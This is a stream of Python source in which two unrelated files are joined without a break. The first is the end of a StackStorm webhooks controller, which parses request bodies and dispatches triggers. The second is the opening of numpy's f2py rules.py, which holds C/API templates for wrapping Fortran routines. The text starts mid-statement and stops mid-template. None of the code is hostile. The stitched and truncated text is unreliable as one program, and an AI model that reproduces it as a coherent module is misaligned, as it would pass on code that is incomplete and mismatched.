content # type is not explicitly provided content_type = pecan.request.headers.get('Content-Type', 'application/json') content_type = parse_content_type_header(content_type=content_type)[0] body = pecan.request.body try: body = self._parse_request_body(content_type=content_type, body=body) except Exception as e: self._log_request('Failed to parse request body: %s.' % (str(e)), pecan.request) msg = 'Failed to parse request body "%s": %s' % (body, str(e)) return pecan.abort(http_client.BAD_REQUEST, msg) headers = self._get_headers_as_dict(pecan.request.headers) # If webhook contains a trace-tag use that else create create a unique trace-tag. trace_context = self._create_trace_context(trace_tag=headers.pop(TRACE_TAG_HEADER, None), hook=hook) if hook == 'st2' or hook == 'st2/': return self._handle_st2_webhook(body, trace_context=trace_context) if not self._is_valid_hook(hook): self._log_request('Invalid hook.', pecan.request) msg = 'Webhook %s not registered with st2' % hook return pecan.abort(http_client.NOT_FOUND, msg) triggers = self._hooks.get_triggers_for_hook(hook) payload = {} payload['headers'] = headers payload['body'] = body # Dispatch trigger instance for each of the trigger found for trigger in triggers: self._trigger_dispatcher.dispatch(trigger, payload=payload, trace_context=trace_context) return body def _parse_request_body(self, content_type, body): if content_type == 'application/json': self._log_request('Parsing request body as JSON', request=pecan.request) body = json.loads(body) elif content_type in ['application/x-www-form-urlencoded', 'multipart/form-data']: self._log_request('Parsing request body as form encoded data', request=pecan.request) body = urlparse.parse_qs(body) else: raise ValueError('Unsupported Content-Type: "%s"' % (content_type)) return body def _handle_st2_webhook(self, body, trace_context): trigger = body.get('trigger', None) payload = body.get('payload', None) if not trigger: msg = 'Trigger not specified.' return pecan.abort(http_client.BAD_REQUEST, msg) self._trigger_dispatcher.dispatch(trigger, payload=payload, trace_context=trace_context) return body def _is_valid_hook(self, hook): # TODO: Validate hook payload with payload_schema. return hook in self._hooks def _register_webhook_trigger_types(self): for trigger_type in WEBHOOK_TRIGGER_TYPES.values(): trigger_service.create_trigger_type_db(trigger_type) def _create_trace_context(self, trace_tag, hook): # if no trace_tag then create a unique one if not trace_tag: trace_tag = 'webhook-%s-%s' % (hook, uuid.uuid4().hex) return TraceContext(trace_tag=trace_tag) def add_trigger(self, trigger): # Note: Permission checking for creating and deleting a webhook is done during rule # creation url = self._get_normalized_url(trigger) LOG.info('Listening to endpoint: %s', urljoin(self._base_url, url)) self._hooks.add_hook(url, trigger) def update_trigger(self, trigger): pass def remove_trigger(self, trigger): # Note: Permission checking for creating and deleting a webhook is done during rule # creation url = self._get_normalized_url(trigger) removed = self._hooks.remove_hook(url, trigger) if removed: LOG.info('Stop listening to endpoint: %s', urljoin(self._base_url, url)) def _get_normalized_url(self, trigger): """ remove the trailing and leading / so that the hook url and those coming from trigger parameters end up being the same. """ return trigger['parameters']['url'].strip('/') def _get_headers_as_dict(self, headers): headers_dict = {} for key, value in headers.items(): headers_dict[key] = value return headers_dict def _log_request(self, msg, request, log_method=LOG.debug): headers = self._get_headers_as_dict(request.headers) body = str(request.body) log_method('%s\n\trequest.header: %s.\n\trequest.body: %s.', msg, headers, body) ############################################## # Event handler methods for the trigger events ############################################## def _handle_create_trigger(self, trigger): LOG.debug('Calling "add_trigger" method (trigger.type=%s)' % (trigger.type)) trigger = self._sanitize_trigger(trigger=trigger) self.add_trigger(trigger=trigger) def _handle_update_trigger(self, trigger): LOG.debug('Calling "update_trigger" method (trigger.type=%s)' % (trigger.type)) trigger = self._sanitize_trigger(trigger=trigger) self.update_trigger(trigger=trigger) def _handle_delete_trigger(self, trigger): LOG.debug('Calling "remove_trigger" method (trigger.type=%s)' % (trigger.type)) trigger = self._sanitize_trigger(trigger=trigger) self.remove_trigger(trigger=trigger) def _sanitize_trigger(self, trigger): sanitized = TriggerAPI.from_model(trigger).to_dict() return sanitized
#!/usr/bin/env python """ Rules for building C/API module with f2py2e. Here is a skeleton of a new wrapper function (13Dec2001): wrapper_function(args) declarations get_python_arguments, say, `a' and `b' get_a_from_python if (successful) { get_b_from_python if (successful) { callfortran if (succesful) { put_a_to_python if (succesful) { put_b_to_python if (succesful) { buildvalue = ... } } } } cleanup_b } cleanup_a return buildvalue """ """ Copyright 1999,2000 Pearu Peterson all rights reserved, Pearu Peterson <pearu@ioc.ee> Permission to use, modify, and distribute this software is given under the terms of the NumPy License. NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. $Date: 2005/08/30 08:58:42 $ Pearu Peterson """ __version__ = "$Revision: 1.129 $"[10:-1] import __version__ f2py_version = __version__.version import pprint import sys import time import types import copy errmess=sys.stderr.write outmess=sys.stdout.write show=pprint.pprint from auxfuncs import * import capi_maps from capi_maps import * import cfuncs import common_rules import use_rules import f90mod_rules import func2subr options={} sepdict={} #for k in ['need_cfuncs']: sepdict[k]=',' for k in ['decl', 'frompyobj', 'cleanupfrompyobj', 'topyarr','method', 'pyobjfrom','closepyobjfrom', 'freemem', 'userincludes', 'includes0','includes','typedefs','typedefs_generated', 'cppmacros','cfuncs','callbacks', 'latexdoc', 'restdoc', 'routine_defs','externroutines', 'initf2pywraphooks', 'commonhooks','initcommonhooks', 'f90modhooks','initf90modhooks']: sepdict[k]='\n' #################### Rules for C/API module ################# module_rules={ 'modulebody':"""\ /* File: #modulename#module.c * This file is auto-generated with f2py (version:#f2py_version#). * f2py is a Fortran to Python Interface Generator (FPIG), Second Edition, * written by Pearu Peterson <pearu@cens.ioc.ee>. * See http://cens.ioc.ee/projects/f2py2e/ * Generation date: """+time.asctime(time.localtime(time.time()))+""" * $R"""+"""evision:$ * $D"""+"""ate:$ * Do not edit this file directly unless you know what you are doing!!! */ #ifdef __cplusplus extern \"C\" { #endif """+gentitle("See f2py2e/cfuncs.py: includes")+""" #includes# #includes0# """+gentitle("See f2py2e/rules.py: mod_rules['modulebody']")+""" static PyObject *#modulename#_error; static PyObject *#modulename#_module; """+gentitle("See f2py2e/cfuncs.py: typedefs")+""" #typedefs# """+gentitle("See f2py2e/cfuncs.py: typedefs_generated")+""" #typedefs_generated# """+gentitle("See f2py2e/cfuncs.py: cppmacros")+""" #cppmacros# """+gentitle("See f2py2e/cfuncs.py: cfuncs")+""" #cfuncs# """+gentitle("See f2py2e/cfuncs.py: userincludes")+""" #userincludes# """+gentitle("See f2py2e/capi_rules.py: usercode")+""" #usercode# /* See f2py2e/rules.py */ #externroutines# """+gentitle("See f2py2e/capi_rules.py: usercode1")+""" #usercode1# """+gentitle("See f2py2e/cb_rules.py: buildcallback")+""" #callbacks# """+gentitle("See f2py2e/rules.py: buildapi")+""" #body# """+gentitle("See f2py2e/f90mod_rules.py: buildhooks")+""" #f90modhooks# """+gentitle("See f2py2e/rules.py: module_rules['modulebody']")+""" """+gentitle("See f2py2e/common_rules.py: buildhooks")+""" #commonhooks# """+gentitle("See f2py2e/rules.py")+""" static FortranDataDef f2py_routine_defs[] = { #routine_defs# \t{NULL} }; static PyMethodDef f2py_module_methods[] = { #pymethoddef# \t{NULL,NULL} }; #if PY_VERSION_HEX >= 0x03000000 static struct PyModuleDef moduledef = { \tPyModuleDef_HEAD_INIT, \t"#modulename#", \tNULL, \t-1, \tf2py_module_methods, \tNULL, \tNULL, \tNULL, \tNULL }; #endif #if PY_VERSION_HEX >= 0x03000000 #define RETVAL m PyObject *PyInit_#modulename#(void) { #else #define RETVAL PyMODINIT_FUNC init#modulename#(void) { #endif \tint i; \tPyObject *m,*d, *s; #if PY_VERSION_HEX >= 0x03000000 \tm = #modulename#_module = PyModule_Create(&moduledef); #else \tm = #modulename#_module = Py_InitModule(\"#modulename#\", f2py_module_methods); #endif \tPy_TYPE(&PyFortran_Type) = &PyType_Type; \timport_array(); \tif (PyErr_Occurred()) \t\t{PyErr_SetString(PyExc_ImportError, \"can't initialize module #modulename# (failed to import numpy)\"); return RETVAL;} \td = PyModule_GetDict(m); \ts = PyString_FromString(\"$R"""+"""evision: $\"); \tPyDict_SetItemString(d, \"__version__\", s); #if PY_VERSION_HEX >= 0x03000000 \ts = PyUnicode_FromString( #else \ts = PyString_FromString( #endif \t\t\"This module '#modulename#' is auto-generated with f2py (version:#f2py_version#).\\nFunctions:\\n\"\n#docs#\".\"); \tPyDict_SetItemString(d, \"__doc__\", s); \t#modulename#_error = PyErr_NewException (\"#modulename#.error\", NULL, NULL); \tPy_DECREF(s); \tfor(i=0;f2py_routine_defs[i].name!=NULL;i++) \t\tPyDict_SetItemString(d, f2py_routine_defs[i].name,PyFortranObject_NewAsAttr(&f2py_routine_defs[i])); #initf2pywraphooks# #initf90modhooks# #initcommonhooks# #interface_usercode# #ifdef F2PY_REPORT_ATEXIT \tif (! PyErr_Occurred()) \t\ton_exit(f2py_report_on_exit,(void*)\"#modulename#\"); #endif \treturn RETVAL; } #ifdef __cplusplus } #endif """, 'separatorsfor':{'latexdoc':'\n\n', 'restdoc':'\n\n'}, 'latexdoc':['\\section{Module \\texttt{#texmodulename#}}\n', '#modnote#\n', '#latexdoc#'], 'restdoc':['Module #modulename#\n'+'='*80, '\n#restdoc#'] } defmod_rules=[ {'body':'/*eof body*/', 'method':'/*eof method*/', 'externroutines':'/*eof externroutines*/', 'routine_defs':'/*eof routine_defs*/', 'initf90modhooks':'/*eof initf90modhooks*/', 'initf2pywraphooks':'/*eof initf2pywraphooks*/', 'initcommonhooks':'/*eof initcommonhooks*/', 'latexdoc':'', 'restdoc':'', 'modnote':{hasnote:'#note#',l_not(hasnote):''}, } ] routine_rules={ 'separatorsfor':sepdict, 'body':""" #begintitle# static char doc_#apiname#[] = \"\\\nFunction signature:\\n\\\n\t#docreturn##name#(#docsignatureshort#)\\n\\\n#docstrsigns#\"; /* #declfortranroutine# */ static PyObject *#apiname#(const PyObject *capi_self, PyObject *capi_args, PyObject *capi_keywds, #functype# (*f2py_func)(#callprotoargument#)) { \tPyObject * volatile capi_buildvalue = NULL; \tvolatile int f2py_success = 1; #decl# \tstatic char *capi_kwlist[] = {#kwlist##kwlistopt##kwlistxa#NULL}; #usercode# #routdebugenter# #ifdef F2PY_REPORT_ATEXIT f2py_start_clock(); #endif \tif (!PyArg_ParseTupleAndKeywords(capi_args,capi_keywds,\\ \t\t\"#argformat##keyformat##xaformat#:#pyname#\",\\ \t\tcapi_kwlist#args_capi##keys_capi##keys_xa#))\n\t\treturn NULL; #frompyobj# /*end of frompyobj*/ #ifdef F2PY_REPORT_ATEXIT f2py_start_call_clock(); #endif #callfortranroutine# if (PyErr_Occurred()) f2py_success = 0; #ifdef F2PY_REPORT_ATEXIT f2py_stop_call_clock(); #endif /*end of callfortranroutine*/ \t\tif (f2py_success) { #pyobjfrom# /*end of pyobjfrom*/ \t\tCFUNCSMESS(\"Building return value.\\n\"); \t\tcapi_buildvalue = Py_BuildValue(\"#returnformat#\"#return#); /*closepyobjfrom*/ #closepyobjfrom# \t\t} /*if (f2py_success) after callfortranroutine*/ /*cleanupfrompyobj*/ #cleanupfrompyobj# \tif (capi_buildvalue == NULL) { #routdebugfailure# \t} else { #routdebugleave# \t} \tCFUNCSMESS(\"Freeing memory.\\n\"); #freemem# #ifdef F2PY_REPORT_ATEXIT f2py_stop_clock(); #endif \treturn capi_buildvalue; } #endtitle# """, 'routine_defs':'#routine_def#', 'initf2pywraphooks':'#initf2pywraphook#', 'externroutines':'#declfortranroutine#', 'doc':'#docreturn##name#(#docsignature#)', 'docshort':'#docreturn##name#(#docsignatureshort#)', 'docs':'"\t#docreturn##name#(#docsignature#)\\n"\n', 'need':['arrayobject.h','CFUNCSMESS','MINMAX'], 'cppmacros':{debugcapi:'#define DEBUGCFUNCS'}, 'latexdoc':['\\subsection{Wrapper function \\texttt{#texname#}}\n', """ \\noindent{{}\\verb@#docreturn##name#@{}}\\texttt{(#latexdocsignatureshort#)} #routnote# #latexdocstrsigns# """], 'restdoc':['Wrapped function ``#name#``\n'+'-'*80, ] } ################## Rules for C/API function ############## rout_rules=[ { # Init 'separatorsfor': {'callfortranroutine':'\n','routdebugenter':'\n','decl':'\n', 'routdebugleave':'\n','routdebugfailure':'\n', 'setjmpbuf':' || ', 'docstrreq':'\n','docstropt':'\n','docstrout':'\n', 'docstrcbs':'\n','docstrsigns':'\\n"\n"', 'latexdocstrsigns':'\n', 'latexdocstrreq':'\n','latexdocstropt':'\n', 'latexdocstrout':'\n','latexdocstrcbs':'\n', }, 'kwlist':'','kwlistopt':'','callfortran':'','callfortranappend':'', 'docsign':'','docsignopt':'','decl':'/*decl*/', 'freemem':'/*freemem*/', 'docsignshort':'','docsignoptshort':'', 'docstrsigns':'','latexdocstrsigns':'', 'docstrreq':'Required arguments:', 'docstropt':'Optional arguments:', 'docstrout':'Return objects:', 'docstrcbs':'Call-back functions:', 'latexdocstrreq':'\\noindent Required arguments:', 'latexdocstropt':'\\noindent Optional arguments:', 'latexdocstrout':'\\noindent Return objects:', 'latexdocstrcbs':'\\noindent Call-back functions:', 'args_capi':'','keys_capi':'','functype':'', 'frompyobj':'/*frompyobj*/', 'cleanupfrompyobj':['/*end of cleanupfrompyobj*/'], #this list will be reversed 'pyobjfrom':'/*pyobjfrom*/', 'closepyobjfrom':['/*end of closepyobjfrom*/'], #this list will be reversed 'topyarr':'/*topyarr*/','routdebugleave':'/*routdebugleave*/', 'routdebugenter':'/*routdebugenter*/', 'routdebugfailure':'/*routdebugfailure*/', 'callfortranroutine':'/*callfortranroutine*/', 'argformat':'','keyformat':'','need_cfuncs':'', 'docreturn':'','return':'','returnformat':'','rformat':'', 'kwlistxa':'','keys_xa':'','xaformat':'','docsignxa':'','docsignxashort':'', 'initf2pywraphook':'', 'routnote':{hasnote:'--- #note#',l_not(hasnote):''}, },{ 'apiname':'f2py_rout_#modulename#_#name#', 'pyname':'#modulename#.#name#', 'decl':'', '_check':l_not(ismoduleroutine) },{ 'apiname':'f2py_rout_#modulename#_#f90modulename#_#name#', 'pyname':'#modulename#.#f90modulename#.#name#', 'decl':'', '_check':ismoduleroutine },{ # Subroutine 'functype':'void', 'declfortranroutine':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'extern void #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'extern void #fortranname#(#callprotoargument#);', ismoduleroutine:'', isdummyroutine:'' }, 'routine_def':{l_not(l_or(ismoduleroutine,isintent_c,isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isdummyroutine):'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'need':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'F_FUNC'}, 'callfortranroutine':[ {debugcapi:["""\tfprintf(stderr,\"debug-capi:Fortran subroutine `#fortranname#(#callfortran#)\'\\n\");"""]}, {hasexternals:"""\ \t\tif (#setjmpbuf#) { \t\t\tf2py_success = 0; \t\t} else {"""}, {isthreadsafe:'\t\t\tPy_BEGIN_ALLOW_THREADS'}, {hascallstatement:'''\t\t\t\t#callstatement#; \t\t\t\t/*(*f2py_func)(#callfortran#);*/'''}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t\t\t\t(*f2py_func)(#callfortran#);'}, {isthreadsafe:'\t\t\tPy_END_ALLOW_THREADS'}, {hasexternals:"""\t\t}"""} ], '_check':issubroutine, },{ # Wrapped function 'functype':'void', 'declfortranroutine':{l_not(l_or(ismoduleroutine,isdummyroutine)):'extern void #F_WRAPPEDFUNC#(#name_lower#,#NAME#)(#callprotoargument#);', isdummyroutine:'', }, 'routine_def':{l_not(l_or(ismoduleroutine,isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_WRAPPEDFUNC#(#name_lower#,#NAME#),(f2py_init_func)#apiname#,doc_#apiname#},', isdummyroutine:'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'initf2pywraphook':{l_not(l_or(ismoduleroutine,isdummyroutine)):''' { extern #ctype# #F_FUNC#(#name_lower#,#NAME#)(void); PyObject* o = PyDict_GetItemString(d,"#name#"); PyObject_SetAttrString(o,"_cpointer", F2PyCapsule_FromVoidPtr((void*)#F_FUNC#(#name_lower#,#NAME#),NULL)); #if PY_VERSION_HEX >= 0x03000000 PyObject_SetAttrString(o,"__name__", PyUnicode_FromString("#name#")); #else PyObject_SetAttrString(o,"__name__", PyString_FromString("#name#")); #endif } '''}, 'need':{l_not(l_or(ismoduleroutine,isdummyroutine)):['F_WRAPPEDFUNC','F_FUNC']}, 'callfortranroutine':[ {debugcapi:["""\tfprintf(stderr,\"debug-capi:Fortran subroutine `f2pywrap#name_lower#(#callfortran#)\'\\n\");"""]}, {hasexternals:"""\ \tif (#setjmpbuf#) { \t\tf2py_success = 0; \t} else {"""}, {isthreadsafe:'\tPy_BEGIN_ALLOW_THREADS'}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t(*f2py_func)(#callfortran#);'}, {hascallstatement:'\t#callstatement#;\n\t/*(*f2py_func)(#callfortran#);*/'}, {isthreadsafe:'\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t}'} ], '_check':isfunction_wrap, },{ # Function 'functype':'#ctype#', 'docreturn':{l_not(isintent_hide):'#rname#,'}, 'docstrout':'\t#pydocsignout#', 'latexdocstrout':['\\item[]{{}\\verb@#pydocsignout#@{}}', {hasresultnote:'--- #resultnote#'}], 'callfortranroutine':[{l_and(debugcapi,isstringfunction):"""\ #ifdef USESCOMPAQFORTRAN \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callcompaqfortran#)\\n\"); #else \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callfortran#)\\n\"); #endif """}, {l_and(debugcapi,l_not(isstringfunction)):"""\ \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callfortran#)\\n\"); """} ], '_check':l_and(isfunction,l_not(isfunction_wrap)) },{ # Scalar function 'declfortranroutine':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'extern #ctype# #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'extern #ctype# #fortranname#(#callprotoargument#);', isdummyroutine:'' }, 'routine_def':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},', isdummyroutine:'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'decl':[{iscomplexfunction_warn:'\t#ctype# #name#_return_value={0,0};', l_not(iscomplexfunction):'\t#ctype# #name#_return_value=0;'}, {iscomplexfunction:'\tPyObject *#name#_return_value_capi = Py_None;'} ], 'callfortranroutine':[ {hasexternals:"""\ \tif (#setjmpbuf#) { \t\tf2py_success = 0; \t} else {"""}, {isthreadsafe:'\tPy_BEGIN_ALLOW_THREADS'}, {hascallstatement:'''\t#callstatement#; /*\t#name#_return_value = (*f2py_func)(#callfortran#);*/ '''}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t#name#_return_value = (*f2py_func)(#callfortran#);'}, {isthreadsafe:'\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t}'}, {l_and(debugcapi,iscomplexfunction):'\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value.r,#name#_return_value.i);'}, {l_and(debugcapi,l_not(iscomplexfunction)):'\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value);'}], 'pyobjfrom':{iscomplexfunction:'\t#name#_return_value_capi = pyobj_from_#ctype#1(#name#_return_value);'}, 'need':[{l_not(isdummyroutine):'F_FUNC'}, {iscomplexfunction:'pyobj_from_#ctype#1'}, {islong_longfunction:'long_long'}, {islong_doublefunction:'long_double'}], 'returnformat':{l_not(isintent_hide):'#rformat#'}, 'return':{iscomplexfunction:',#name#_return_value_capi', l_not(l_or(iscomplexfunction,isintent_hide)):',#name#_return_value'}, '_check':l_and(isfunction,l_not(isstringfunction),l_not(isfunction_wrap)) },{ # String function # in use for --no-wrap 'declfortranroutine':'extern void #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', 'routine_def':{l_not(l_or(ismoduleroutine,isintent_c)): # '\t{\"#name#\",-1,{{-1}},0,(char *)F_FUNC(#fortranname#,#FORTRANNAME#),(void *)#apiname#,doc_#apiname#},', '\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c): # '\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(void *)#apiname#,doc_#apiname#},' '\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},' }, 'decl':['\t#ctype# #name#_return_value = NULL;', '\tint #name#_return_value_len = 0;'], 'callfortran':'#name#_return_value,#name#_return_value_len,', 'callfortranroutine':['\t#name#_return_value_len = #rlength#;', '\tif ((#name#_return_value = (string)malloc(sizeof(char)*(#name#_return_value_len+1))) == NULL) {', '\t\tPyErr_SetString(PyExc_MemoryError, \"out of memory\");', '\t\tf2py_success = 0;', '\t} else {', "\t\t(#name#_return_value)[#name#_return_value_len] = '\\0';", '\t}', '\tif (f2py_success) {', {hasexternals:"""\ \t\tif (#setjmpbuf#) { \t\t\tf2py_success = 0; \t\t} else {"""}, {isthreadsafe:'\t\tPy_BEGIN_ALLOW_THREADS'}, """\ #ifdef USESCOMPAQFORTRAN \t\t(*f2py_func)(#callcompaqfortran#); #else \t\t(*f2py_func)(#callfortran#); #endif """, {isthreadsafe:'\t\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t\t}'}, {debugcapi:'\t\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value_len,#name#_return_value);'}, '\t} /* if (f2py_success) after (string)malloc */', ], 'returnformat':'#rformat#', 'return':',#name#_return_value', 'freemem':'\tSTRINGFREE(#name#_return_value);', 'need':['F_FUNC','#ctype#','STRINGFREE'], '_check':l_and(isstringfunction,l_not(isfunction_wrap)) # ???obsolete }, { # Debugging 'routdebugenter':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#(#docsignature#)\\n");', 'routdebugleave':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#: successful.\\n");', 'routdebugfailure':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#: failure.\\n");', '_check':debugcapi } ] ################ Rules for arguments ################## typedef_need_dict = {islong_long:'long_long', islong_double:'long_double', islong_complex:'complex_long_double', isunsigned_char:'unsigned_char', isunsigned_short:'unsigned_short', isunsigned:'unsigned', isunsigned_long_long:'unsigned_long_long', isunsigned_chararray:'unsigned_char', isunsigned_shortarray:'unsigned_short', isunsigned_long_longarray:'unsigned_long_long', issigned_long_longarray:'long_long', } aux_rules=[ { 'separatorsfor':sepdict }, { # Common 'frompyobj':['\t/* Processing auxiliary variable #varname# */', {debugcapi:'\tfprintf(stderr,"#vardebuginfo#\\n");'},], 'cleanupfrompyobj':'\t/* End of cleaning variable #varname# */', 'need':typedef_need_dict, }, # Scalars (not complex) { # Common 'decl':'\t#ctype# #varname# = 0;', 'need':{hasinitvalue:'math.h'}, 'frompyobj':{hasinitvalue:'\t#varname# = #init#;'}, '_check':l_and(isscalar,l_not(iscomplex)), }, { 'return':',#varname#', 'docstrout':'\t#pydocsignout#', 'docreturn':'#outvarname#,', 'returnformat':'#varrformat#', '_check':l_and(isscalar,l_not(iscomplex),isintent_out), }, # Complex scalars { # Common 'decl':'\t#ctype# #varname#;', 'frompyobj': {hasinitvalue:'\t#varname#.r = #init.r#, #varname#.i = #init.i#;'}, '_check':iscomplex }, # String { # Common 'decl':['\t#ctype# #varname# = NULL;', '\tint slen(#varname#);', ], 'need':['len..'], '_check':isstring }, # Array { # Common 'decl':['\t#ctype# *#varname# = NULL;', '\tnpy_intp #varname#_Dims[#rank#] = {#rank*[-1]#};', '\tconst int #varname#_Rank = #rank#;', ], 'need':['len..',{hasinitvalue:'forcomb'},{hasinitvalue:'CFUNCSMESS'}], '_check':isarray }, # Scalararray { # Common '_check':l_and(isarray,l_not(iscomplexarray)) },{ # Not hidden '_check':l_and(isarray,l_not(iscomplexarray),isintent_nothide) }, # Integer*1 array {'need':'#ctype#', '_check':isint1array, '_depend':'' }, # Integer*-1 array {'need':'#ctype#', '_check':isunsigned_chararray, '_depend':'' }, # Integer*-2 array {'need':'#ctype#', '_check':isunsigned_shortarray, '_depend':'' }, # Integer*-8 array {'need':'#ctype#', '_check':isunsigned_long_longarray, '_depend':'' }, # Complexarray {'need':'#ctype#', '_check':iscomplexarray, '_depend':'' }, # Stringarray { 'callfortranappend':{isarrayofstrings:'flen(#varname#),'}, 'need':'string', '_check':isstringarray } ] arg_rules=[ { 'separatorsfor':sepdict }, { # Common 'frompyobj':['\t/* Processing variable #varname# */', {debugcapi:'\tfprintf(stderr,"#vardebuginfo#\\n");'},], 'cleanupfrompyobj':'\t/* End of cleaning variable #varname# */', '_depend':'', 'need':typedef_need_dict, }, # Doc signatures { 'docstropt':{l_and(isoptional,isintent_nothide):'\t#pydocsign#'}, 'docstrreq':{l_and(isrequired,isintent_nothide):'\t#pydocsign#'}, 'docstrout':{isintent_out:'\t#pydocsignout#'}, 'latexdocstropt':{l_and(isoptional,isintent_nothide):['\\item[]{{}\\verb@#pydocsign#@{}}', {hasnote:'--- #note#'}]}, 'latexdocstrreq':{l_and(isrequired,isintent_nothide):['\\item[]{{}\\verb@#pydocsign#@{}}', {hasnote:'--- #note#'}]}, 'latexdocstrout':{isintent_out:['\\item[]{{}\\verb@#pydocsignout#@{}}', {l_and(hasnote,isintent_hide):'--- #note#', l_and(hasnote,isintent_nothide):'--- See above.'}]}, 'depend':'' }, # Required/Optional arguments { 'kwlist':'"#varname#",', 'docsign':'#varname#,', '_check':l_and(isintent_nothide,l_not(isoptional)) }, { 'kwlistopt':'"#varname#",', 'docsignopt':'#varname#=#showinit#,', 'docsignoptshort':'#varname#,', '_check':l_and(isintent_nothide,isoptional) }, # Docstring/BuildValue { 'docreturn':'#outvarname#,', 'returnformat':'#varrformat#', '_check':isintent_out }, # Externals (call-back functions) { # Common 'docsignxa':{isintent_nothide:'#varname#_extra_args=(),'}, 'docsignxashort':{isintent_nothide:'#varname#_extra_args,'}, 'docstropt':{isintent_nothide:'\t#varname#_extra_args := () input tuple'}, 'docstrcbs':'#cbdocstr#', 'latexdocstrcbs':'\\item[] #cblatexdocstr#', 'latexdocstropt':{isintent_nothide:'\\item[]{{}\\verb@#varname#_extra_args := () input tuple@{}} --- Extra arguments for call-back function {{}\\verb@#varname#@{}}.'}, 'decl':['\tPyObject *#varname#_capi = Py_None;', '\tPyTupleObject *#varname#_xa_capi = NULL;', '\tPyTupleObject *#varname#_args_capi = NULL;', '\tint #varname#_nofargs_capi = 0;', {l_not(isintent_callback):'\t#cbname#_typedef #varname#_cptr;'} ], 'kwlistxa':{isintent_nothide:'"#varname#_extra_args",'}, 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'xaformat':{isintent_nothide:'O!'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'keys_xa':',&PyTuple_Type,&#varname#_xa_capi', 'setjmpbuf':'(setjmp(#cbname#_jmpbuf))', 'callfortran':{l_not(isintent_callback):'#varname#_cptr,'}, 'need':['#cbname#','setjmp.h'], '_check':isexternal }, { 'frompyobj':[{l_not(isintent_callback):"""\ if(F2PyCapsule_Check(#varname#_capi)) { #varname#_cptr = F2PyCapsule_AsVoidPtr(#varname#_capi); } else { #varname#_cptr = #cbname#; } """},{isintent_callback:"""\ if (#varname#_capi==Py_None) { #varname#_capi = PyObject_GetAttrString(#modulename#_module,\"#varname#\"); if (#varname#_capi) { if (#varname#_xa_capi==NULL) { if (PyObject_HasAttrString(#modulename#_module,\"#varname#_extra_args\")) { PyObject* capi_tmp = PyObject_GetAttrString(#modulename#_module,\"#varname#_extra_args\"); if (capi_tmp) #varname#_xa_capi = (PyTupleObject *)PySequence_Tuple(capi_tmp); else #varname#_xa_capi = (PyTupleObject *)Py_BuildValue(\"()\"); if (#varname#_xa_capi==NULL) { PyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#varname#_extra_args to tuple.\\n\"); return NULL; } } } } if (#varname#_capi==NULL) { PyErr_SetString(#modulename#_error,\"Callback #varname# not defined (as an argument or module #modulename# attribute).\\n\"); return NULL; } } """}, ## {l_not(isintent_callback):"""\ ## if (#varname#_capi==Py_None) { ## printf(\"hoi\\n\"); ## } ## """}, """\ \t#varname#_nofargs_capi = #cbname#_nofargs; \tif (create_cb_arglist(#varname#_capi,#varname#_xa_capi,#maxnofargs#,#nofoptargs#,&#cbname#_nofargs,&#varname#_args_capi,\"failed in processing argument list for call-back #varname#.\")) { \t\tjmp_buf #varname#_jmpbuf;""", {debugcapi:["""\ \t\tfprintf(stderr,\"debug-capi:Assuming %d arguments; at most #maxnofargs#(-#nofoptargs#) is expected.\\n\",#cbname#_nofargs); \t\tCFUNCSMESSPY(\"for #varname#=\",#cbname#_capi);""", 